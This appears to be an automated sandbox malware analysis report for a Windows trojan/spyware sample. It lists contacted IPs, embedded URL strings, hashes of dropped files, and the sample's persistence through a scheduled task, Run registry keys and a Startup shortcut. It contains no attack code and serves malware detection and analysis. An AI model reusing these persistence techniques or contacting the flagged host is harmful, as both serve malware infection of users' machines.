                                          http://www.fontbureau.com/designers/cabarga.htmlN9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/cThe9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.galapagosdesign.com/staff/dennis.htm9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/frere-user.html9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.jiyu-kobo.co.jp/9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.galapagosdesign.com/DPlease9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers89758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.fonts.com9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.sandoll.co.kr9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.urwpp.deDPlease9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.zhongyicts.com.cn9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9758xBqgE1azKnB.exe, 00000000.00000002.1714031582.000000000309C000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000007.00000002.3827541610.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, grjujyNaBLaKbU.exe, 00000008.00000002.1747690067.0000000002BCA000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 0000000E.00000002.1850299737.0000000002E55000.00000004.00000800.00020000.00000000.sdmp, 9758xBqgE1azKnB.exe, 00000013.00000002.1908285352.0000000002479000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.sakkal.com9758xBqgE1azKnB.exe, 00000000.00000002.1715832568.00000000071A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      18.181.154.24
                                                                      		unknownUnited States
                                                                      		16509AMAZON-02UStrue

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1562040
                                                                      Start date and time:2024-11-25 06:24:05 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:29
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Critical Process Termination
                                                                      Sample name:9758xBqgE1azKnB.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@33/21@0/1
                                                                      EGA Information:
                                                                      • Successful, ratio: 62.5%
                                                                      HCA Information:
                                                                      • Successful, ratio: 98%
                                                                      • Number of executed functions: 469
                                                                      • Number of non-executed functions: 12
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target 9758xBqgE1azKnB.exe, PID 7700 because it is empty
                                                                      • Execution Graph export aborted for target 9758xBqgE1azKnB.exe, PID 8080 because it is empty
                                                                      • Execution Graph export aborted for target grjujyNaBLaKbU.exe, PID 7400 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      00:24:57API Interceptor6718413x Sleep call for process: 9758xBqgE1azKnB.exe modified
                                                                      00:24:58API Interceptor12x Sleep call for process: powershell.exe modified
                                                                      00:24:59API Interceptor3x Sleep call for process: grjujyNaBLaKbU.exe modified
                                                                      05:24:59Task SchedulerRun new task: grjujyNaBLaKbU path: C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      05:25:01AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9758xBqgE1azKnB C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      05:25:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9758xBqgE1azKnB C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      05:25:18AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      No context

                                                                      Domains

                                                                      No context

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      AMAZON-02USfile.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                      • 18.239.168.24
                                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                                      • 108.158.75.108
                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                      • 3.167.152.14
                                                                      https://clever-photos-686127.framer.app/Get hashmaliciousUnknownBrowse
                                                                      • 108.158.75.21
                                                                      bin.sh.elfGet hashmaliciousMiraiBrowse
                                                                      • 54.171.230.55
                                                                      apep.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                      • 54.183.101.83
                                                                      apep.spc.elfGet hashmaliciousMiraiBrowse
                                                                      • 52.65.67.33
                                                                      apep.m68k.elfGet hashmaliciousUnknownBrowse
                                                                      • 18.183.72.200
                                                                      apep.arm6.elfGet hashmaliciousMiraiBrowse
                                                                      • 18.183.140.68
                                                                      apep.sh4.elfGet hashmaliciousMiraiBrowse
                                                                      • 54.110.214.164

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9758xBqgE1azKnB._aa799425bed1b3d36059a0f9e236de6a71257a_3b6de569_a5fee1dc-3513-4561-b22d-7d61e242a063\Report.wer

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):1.2422724671372962
                                                                      Encrypted:false
                                                                      SSDEEP:192:w4V/vApeM0BU/Ka67Pf4nv5zuiF8Z24IO8/4Yyt:wQvApeHBU/Ka+Yv5zuiF8Y4IO8/ly
                                                                      MD5:9503D1308C956667B86BECAEFF5C9607
                                                                      SHA1:CAA9E63716080119CA92C8458AE845AFFB9E1E10
                                                                      SHA-256:AFF8FAE40097EFF2D0A07B6227BF8264BDA3FA1D7A41F32D6CAE8FD49187F29C
                                                                      SHA-512:74AFEAD525FEDE602D7537D49F849EEAABF8892C585A7FB4F5C5C7B8D2E21EF621B58A1B57F427FDB226715D2328F1A98539B809F736F3B7058B645013515BBF
                                                                      Malicious:false
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.r.i.t.i.c.a.l.P.r.o.c.e.s.s.F.a.u.l.t.2.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.9.8.6.1.1.0.4.3.9.0.1.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.f.e.e.1.d.c.-.3.5.1.3.-.4.5.6.1.-.b.2.2.d.-.7.d.6.1.e.2.4.2.a.0.6.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.f.3.d.f.4.e.-.1.e.5.0.-.4.8.3.8.-.b.3.6.9.-.a.2.8.1.4.1.0.b.5.6.e.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.7.5.8.x.B.q.g.E.1.a.z.K.n.B...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.N.H.w.E...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.0.0.-.0.0.0.1.-.0.0.1.4.-.f.4.3.1.-.5.1.5.e.f.a.3.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.c.7.b.2.6.5.b.0.d.8.e.a.9.2.d.a.8.9.7.6.9.d.0.f.a.3.5.0.c.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.f.f.b.e.2.8.4.7.5.9.0.e.8.7.6.8.9.2.b.4.1.5.8.5.7.8.4.b.4.0.1.4.4.c.2.2.4.1.6.0.!.9.7.5.8.x.B.q.g.E.1.a.z.K.n.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BE7.tmp.dmp

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Nov 25 05:28:30 2024, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):360875
                                                                      Entropy (8bit):3.5765657308219025
                                                                      Encrypted:false
                                                                      SSDEEP:3072:VrwE59WqFylhH5y6/tpM4uEqscAzhAP1uILTgP6:VriqFy7HActS4wAzhx+TgP
                                                                      MD5:387F8379D4618D1678CCD5BCDD14552A
                                                                      SHA1:2C42FC30799BC7951B590D9CA7CA7831E4C4E5BC
                                                                      SHA-256:AF9DD30A706A712D8241A5BE0D167713F614F500C33148419C41E627F2F9E56B
                                                                      SHA-512:B6891418435DDFB262C160C61B26E2FE54A230317017B9AB871545815C9B73EF06965B7CA26A9281B2608E15A671A53BC9ECC954B8A8D35A3B6C98566AAF4E05
                                                                      Malicious:false
                                                                      Preview:MDMP..a..... .........Dg............4...........0"..H.......$...x,.......,...k..........`.......8...........T............I...8...........,..........................................................................................eJ...... /......GenuineIntel............T...........*.Dg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DCD.tmp.WERInternalMetadata.xml

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):6540
                                                                      Entropy (8bit):3.718426231809118
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJSk6QsYk4jO4kYprM89bNxsf05Pm:R6lXJx6DYkj4kMNqfF
                                                                      MD5:798CF570A02E023026EE083EB109FD37
                                                                      SHA1:E3899D163A01D45B237ECDE51B85E5E987F87B19
                                                                      SHA-256:977A50D956FFE5F57D38D28ECFF2C415B616F12C6A30D4760FC5C1FFE2110034
                                                                      SHA-512:FE07C0CD73FB0D0CBF329CDC72BD14D534B0B8FAEA85BFE017F842DE8586F13B5F25AF064BA53C44D71D9FD28299A072217BDDBA1223AD49DBE17A83EFEB1F29
                                                                      Malicious:false
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DFD.tmp.xml

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4888
                                                                      Entropy (8bit):4.486273295770891
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zsOJg77aI90fWpW8VYiYm8M4Jt3FF+q8vRItS3975wd:uIjfEI72O7VWJ9K+S3975wd
                                                                      MD5:2C3EE5D70B401041468C06CCE02ED104
                                                                      SHA1:EA25A2427EE460CB8D8926CA0243729026237023
                                                                      SHA-256:1A91E3B66D9BDC7602AD46BCBE362728151667362F24030D5BA39EB8073D07B5
                                                                      SHA-512:5D347CBD96DCCBDF08A6B75B272AA27FB0E157BD95AF34FC8D773F70EC74587DCE12197290C4015077A80D50E0E752AE3932D5EF22911CE5FD728C213735D1D1
                                                                      Malicious:false
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="603151" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9758xBqgE1azKnB.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:true
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\grjujyNaBLaKbU.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\grjujyNaBLaKbU.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):2232
                                                                      Entropy (8bit):5.379677338874509
                                                                      Encrypted:false
                                                                      SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZSUyus:tLHxvIIwLgZ2KRHWLOugEs
                                                                      MD5:CDD49264DF85EB760D31ACA6C430734F
                                                                      SHA1:1EE7B95307CF8A61FA4031F5FAA2EE2EAA98853C
                                                                      SHA-256:155727CEC1ED0F44E6D6B68D91027D5FFE2752324B033A6BC4D0759BD4E73812
                                                                      SHA-512:9F6B2E807AB4430494BBE31D015F1758C712CB5306B88CDF545DB0890EABB52E140BBB649AD989328146A0594271A1857C02E581DE96504EE673B34D2F38DC24
                                                                      Malicious:false
                                                                      Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                      C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\9758xBqgE1azKnB.exe
                                                                      File Type:Generic INItialization configuration [WIN]
                                                                      Category:dropped
                                                                      Size (bytes):58
                                                                      Entropy (8bit):3.598349098128234
                                                                      Encrypted:false
                                                                      SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                                      MD5:5362ACB758D5B0134C33D457FCC002D9
                                                                      SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                                      SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                                      SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                                      Malicious:false
                                                                      Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrao0pob.vfp.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptanzkqs.3if.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzb2yt1e.22j.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtganllf.awn.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\tmp21F.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\AppData\Roaming\9758xBqgE1azKnB.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1580
                                                                      Entropy (8bit):5.117777286684185
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNta2xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTzv
                                                                      MD5:F659B281A1724D379D187BF4921815E0
                                                                      SHA1:0C82F950FD6882B140668C582FBE26E24D435EF9
                                                                      SHA-256:D9D9C8608F7EAAA9EEBB8BF106EB2B3CA6B5D10DB6654C8E7837384B4209EB67
                                                                      SHA-512:890317690A04FAA4F19B0A8D68EBE055D203E50289B3BC60B90DAFBECA30E33359575B6AB74AD9897D68530EB690106F7A856D1735C541ADB2E176EE4351239F
                                                                      Malicious:false
